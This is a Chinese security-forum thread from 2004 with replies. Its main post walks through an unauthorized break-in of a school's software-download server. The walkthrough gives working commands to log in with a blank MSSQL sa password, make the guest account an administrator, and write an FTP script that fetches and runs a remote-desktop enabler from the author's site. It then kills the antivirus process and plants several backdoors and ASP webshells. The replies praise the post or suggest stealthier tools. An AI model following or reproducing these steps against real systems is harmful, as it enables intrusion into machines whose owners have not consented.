|
作者: xuesha [xuesha] 论坛用户 | 登录 |
前言: 我所处的网络是一个学校内部的校园网, 所有寝室里的电脑全部靠学校一台DHCP服务器自动分配IP地址上网. 不知道为什么最近一段时间,学校的网络不太稳定,而且同学的机器安全越来越好.几乎很难入侵. 后来知道是学校为学生开设了一个WEB地址,里面有防毒软件下载 出于对技术的追求.对于个各杀毒软件的测试,可以更好的保护我们的后门程序. 我也上去下载了安装玩玩.( 网络卫士). 不安装还好,一装,差点没把我的气死. 除了能够杀出几百年前的那些黑客工具之外. 一些后程序本根发现不了.老报告.你的机器安全.可以放心使用.晕.什么软件啊. 气归气吧.出于本能,突然有种想对这个下载的站进行一次安全性测试,看看能不能入侵. 因为是内网的服务器提供的,软件下载功能.我就没用内鸡.而直接对其入侵分析. let 's go 一.准备工具: 1. x-scan扫描器. 2. supersqlexec (mssql连接器) 3.2k3389 (开3389) 4.c3389 (改3389) 5. winshell 后门程序 6.wineggdrop 后门程序 7.Remote Administrator 2.1中文版 (永不被杀) 8.tftpd32小型FTP服务器 9. tskill.exe 杀掉系统防毒软件进程 二.收集主机信息. 打开x-scan ,在扫描模块中,选中全部模块,对其进行全面的信息收集.,然后在扫描参数选项卡中,指定IP范围里就填入: 172.16.1.250 就是提供软件下载的服务器IP地址. 一切设置完成后,就点击"扫描"接钮. 不出20分钟,扫描已经完成.查看了一下扫描信息. 我靠.眼睛一亮.有个SQL弱口令(sa密码为空).我真不敢相信自己的眼睛.这年头这类东西还存在的啊. 不管了.拿出supersqlexec 填入IP,帐号为:SA,密码既然是空,我就不填了. 点击"连接". 突然弹出"连接成功"对话框. 看来真的存在这个漏洞. 那我们还等什么,dir查看一下再说了. 发现系统目录在 c:\winnt\system32. 再用 net start 查看了一下,系统服务.发现里面安装了一些常规服务外,还有个防毒软件(网各卫士) . 再用 net user 查看了一下系统中存在的所有用户.发现除了管理员帐号跟guest 帐号外,还有个 why 帐号. 和TsInternetUser.(TsInternetUser帐号的存在说明这台机器是server) 管它呢. 先加个自己的帐号在里面吧. 但建立新帐号太明显.怕被发现. 我还是看一下guest帐号吧.在它身上做点文章. net user guest 发现这个帐号没被启用. 那真是太好了.我马上把它击活 net user guest /active:yes 然后加了个密码 net user guest xuesha 接着加为管理员: net localgroup administrators guest /add 既然有了帐号. 还有对方又是server系统,我马上用终端连接器,进行连接.mstsc 输入IP.点击连接.等了近10秒种,发现连接不上" 中断远程桌面"的提示信息. 看来管理员没用开3389端口哦. 那咱办.放弃吗? 这怎么可能.太不像我的作风了. 既然可以用dos命令. 那我为何不用用 ftp 功能啊. 把开3389的端口的工具上传上去. 想到这里,说做就做.马上在 supersqlexec 的提示行中,输入命令,建立一个TXT文件,让服务器自动下载并运行程序. 过程如下: echo open www.tmwl.net >up.txt echo tmwl >>up.txt echo XXXX >>up.txt get 2k3389.exe >>up.txt bye >>up.txt 为了正实,这个文件确实建立成功. 我用type up.txt查看了下. 一切OK.这下就有好戏上场了. 在提示行中输入: ftp -s:up.txt .然后回车. 如果不出意外,几秒钟后,就会提示,文件下载成功. dir 2k3389.exe /s 查找了一下,果然发现文件已经下载成功了. 我想每个人,做到这一步的时候,心情一样跟我开心.有种说不出的喜乐. 还等什么啊. 运行 2k3389.exe 程序哦. 等服务器重启上来后, 一台3389(内网肉鸡产生了).我等啊等. 10分钟以后,我用mstsc 再次连接. 果然出现登录终端的提示界面. 一阵惊喜,在用户名处输入: guest 刚刚建立的帐号 在密码处输入: xuesha 密码 回车. 一阵不安的等待. 一个模糊的新桌面出现在我的前面.哈哈............各位. 我已经成功进入了 先申明一下. 系统开3389加新建帐号.只是一个后门安制方法. 为了以后我能完全控制这个服务器.接下来,我给它一连开了4个telnet后门. 第二个后门: 这个后门,我当然是把服务器内部自带的 telnet 服务给打开. 好让下次可以在命令提示符下控制. 首先,我们对其 telnet 服务进行配制. 不要把管理员当傻子哦. 这也是为了更好的让后门只为我服务. 1. 运行 tlntadmn.exe 程序.来配制 telnet 服务. 先把 默认的 23 端口改为: 111 再改登录认证 NTLM 值. 设置完毕后,我试着 telnet 172.16.1.250 111, ,成功进入.说明这个后门做成功了. 第三个后门: 这个后门.当然是要首选 winshell 了. 为了更好的把工具上传到服务器上, 我在本地开了一个小型的 tftp服务.(有的是tftpd32) 没想到,刚上传完,就被杀了.5555555555555555555 咱办.不传了吗?NO. 我们把防毒软件的进程,杀掉就行了. 它还防我们个毛啊. 该是我们防它的时候了. tftp -i 172.16.1.1 get tskill.exe 马上把服务器运行这个命令. 把本机的 tskill.exe 工具上传上去. 杀掉系统防毒软件进程 哈哈.这回它没戏了. 还等什么啊,把winshell服务端上传上去,并运行哦. 第四个后门: 这个后门,我用的是: wineggdrop 后门程序 这个后门程序有个特点,必须把里面自带的一个服务端跟dll文件一起复制到\winnt\system32目录下,才能正常运行的. 希望大家在使用时候,要注意到这点. 有关wineggdrop 后门程序 的服务器配制与 如何在肉鸡上安装,服务端.这里就不介绍了. 具体的使用方法,自己研究吧. 第五个后门: Remote Administrator 2.1中文版 (永不被杀) 这是个远程控制的. 具体的使用方法,这里不介绍了. 只要你能上传到服务器上,一切好办. 第六个后门; 学校不是开了一个 web 软件下载服务嘛. 那我就放入一个 fso.asp 木马.或者cmd.asp等一些网页的木马.以备不时之需哦. 后门工具的使用方法,我这就不用介绍了.有兴趣朋友自己研究吧. 这里主要是介绍一种入侵的思路. 技术会过时,学习方法,入侵思路不会过时.只要你好好分析别人的入侵思路,结合自己的方法.我想你一定会成为一个入侵高手. 我不是什么黑客,只是对网络安全研究有所兴趣. 更惨的是我这次期未考试.网络工程只得了48分.下学期来得回学校补考.真不知道是中国教育界的悲哀.还是学校在误人子弟. 作者 : 血杀 所属组织: 炎黄兵团 WEB:http://www.tmwl.net QQ: 150582300 |
地主 发表时间: 04-06-20 16:40 |
回复: lijingxi [lijingxi] 见习版主 | 登录 |
大概看了一下 UP |
B1层 发表时间: 04-06-20 18:36 |
回复: hcz [hcz] 论坛用户 | 登录 |
哎 |
B2层 发表时间: 04-06-20 18:43 |
回复: qqwinner [qqwinner] 论坛用户 | 登录 |
好文章,我顶,我也是局域网的,也曾用X-SAN描过网内机子,扫到别人的机也存在漏洞,但是就不会入侵 看完这篇文件得益不浅,我顶! |
B3层 发表时间: 04-06-20 19:31 |
回复: hacker521 [hacker521] 论坛用户 | 登录 |
看了一下,应该还可以,不过我觉得你的入侵还是有比较不足的地方: 1入侵太过于简单,没有什么参考价值,比如那个SQL弱口令,现在已经很难碰到了。而且只要稍微懂点入侵的人,遇到这种情况应该也会知道下面该怎么做了。 2把GUEST设置为管理员,从表面上看好象比较隐蔽,不过如果管理员在查网络状况时如果发现自己电脑中的GUEST用户不仅被启用而且还被加为了管理员,除非他是菜鸟不然蠢子也会知道自己被**啦 3在后面基本上都是安装后门的过程,这个比较有新意,不过安装比较常用的后门对于服务器应该不是很好吧,像你上面所说的后门瑞星,诺顿基本上可以全部摆平,而一旦发现后门,你前面的那些努力就都白费了,我的建议是最好去搜一些国外不怎么出名但实用的后门,或者国内最新后门会比较好 |
B4层 发表时间: 04-06-20 19:49 |
|
20CN网络安全小组版权所有
Copyright © 2000-2010 20CN Security Group. All Rights Reserved.
论坛程序编写:NetDemon
粤ICP备05087286号